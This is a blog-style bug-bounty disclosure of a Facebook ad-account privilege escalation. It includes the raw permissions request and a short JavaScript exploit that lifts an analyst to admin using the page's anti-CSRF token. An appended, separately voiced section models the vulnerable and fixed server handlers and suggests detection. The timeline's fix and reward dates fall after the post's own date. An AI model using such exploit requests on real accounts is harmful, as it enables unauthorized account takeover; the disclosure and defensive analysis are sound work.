Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015


facebook exploit 2015

I discovered a vulnerability in Facebook that allowed a normal user of an ad account to gain unauthorized admin access to that ad account.

Admins of an ad account can add any user to their ad account with one of these three roles:

  1. admin
  2. advertiser
  3. analyst
More details on these roles are at the link.

Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages. It can be accessed from

In Business Manager, a business account can assign agencies to its own ad accounts, so that the agency gets limited access to those ad accounts (the owner sets this access level during the assign-agency process).

The vulnerability I found allowed an agency with a non-admin role (advertiser or analyst, roles 2 and 3 above) to change its own access to admin!

Scenario :

I have a business account and I give analyst permission on my ad account to another business account so it can work on it!
That business account can bypass the roles and get admin access!


With only analyst permission on an ad account, send this request:

request url: POST /ads/manage/settings/permissions/?action=add_user

request body:

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 = admin, 1002 = advertiser, 1003 = analyst]

Exploit :

var Xhr;
Xhr = new XMLHttpRequest();
Xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
Xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// the fb_dtsg anti-CSRF token is read from the logged-in page
p += "&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);

__ACCID__ = ad account id
__USERID__ = this user will become the new admin ;)
__PERM__ = permission (1001, 1002, 1003)

POC:

I removed some sections that showed user ids or email addresses.
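The root cause described above is a server-side authorization gap: the permissions endpoint accepted a role change from any member of the ad account, and nothing tied an agency user's role to the ceiling the owner set when assigning the agency. The following is an added example, not code from this post or from Facebook, that models that endpoint in Node.js with the vulnerable check beside a fixed one. The role ids 1001/1002/1003 and the field names act, user_id and add_user_permission come from the post; the account id, user ids, the agencyCeiling map, the handler names and all handler logic are assumptions.

```javascript
// Added example (not Facebook's code): a model of the "add_user" permission
// endpoint with the missing authorization check beside a fixed version.
// Role ids come from the post; account/user ids and the handler logic are assumed.
const ROLE = { ADMIN: 1001, ADVERTISER: 1002, ANALYST: 1003 };
const ROLE_RANK = { [ROLE.ANALYST]: 1, [ROLE.ADVERTISER]: 2, [ROLE.ADMIN]: 3 };

// Parse the URL-encoded POST body shown in the post into a typed object.
function parseAddUserBody(body) {
  const params = new URLSearchParams(body);
  const perm = Number(params.get('add_user_permission'));
  return {
    act: params.get('act'),
    user_id: params.get('user_id'),
    add_user_permission: Number.isInteger(perm) ? perm : null,
  };
}

// Constructed state: one ad account whose owner assigned an agency user with
// analyst access only (the "assign agency" step in Business Manager).
function makeAccount() {
  return {
    id: '111',
    // current role of each user on the account
    roles: new Map([['owner_admin', ROLE.ADMIN], ['agency_user', ROLE.ANALYST]]),
    // ceiling the owner granted to agency users; they must never exceed it
    agencyCeiling: new Map([['agency_user', ROLE.ANALYST]]),
  };
}

// Vulnerable handler: the only check is that the caller has some role on the
// account, so an analyst can write any role, including for itself.
function addUserPermissionVulnerable(account, callerId, req) {
  if (req.act !== account.id || !account.roles.has(callerId)) {
    return { ok: false, reason: 'caller has no access to this account' };
  }
  account.roles.set(req.user_id, req.add_user_permission);
  return { ok: true };
}

// Fixed handler: only an admin of this account may change roles, the role id
// must be a known one, and an agency user can never be raised above the
// ceiling the owner granted.
function addUserPermissionFixed(account, callerId, req) {
  if (req.act !== account.id || account.roles.get(callerId) !== ROLE.ADMIN) {
    return { ok: false, reason: 'caller is not an admin of this account' };
  }
  if (!(req.add_user_permission in ROLE_RANK)) {
    return { ok: false, reason: 'unknown role id' };
  }
  const ceiling = account.agencyCeiling.get(req.user_id);
  if (ceiling !== undefined && ROLE_RANK[req.add_user_permission] > ROLE_RANK[ceiling]) {
    return { ok: false, reason: 'role exceeds what the owner granted the agency' };
  }
  account.roles.set(req.user_id, req.add_user_permission);
  return { ok: true };
}

// Replay the post's request (agency analyst promoting itself to admin, with a
// constructed fb_dtsg value) against a handler and report the resulting role.
function replay(handler) {
  const account = makeAccount();
  const body = 'act=111&user_id=agency_user&add_user_permission=1001&__a=1&fb_dtsg=CONSTRUCTED_TOKEN';
  const result = handler(account, 'agency_user', parseAddUserBody(body));
  return { ok: result.ok, reason: result.reason, roleAfter: account.roles.get('agency_user') };
}

console.log('vulnerable:', replay(addUserPermissionVulnerable)); // ok: true, roleAfter: 1001
console.log('fixed:', replay(addUserPermissionFixed));           // ok: false, roleAfter: 1003
```

The fixed handler makes two decisions the vulnerable one skips: the caller's own role on the target account is looked up server-side rather than inferred from mere membership, and the requested role is compared against the ceiling stored when the agency was assigned. A detection angle for the same gap is to alert on any add_user_permission request where the caller's current role is below the role being written, which is exactly the shape of the request in this post.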


  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability was fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8,000.

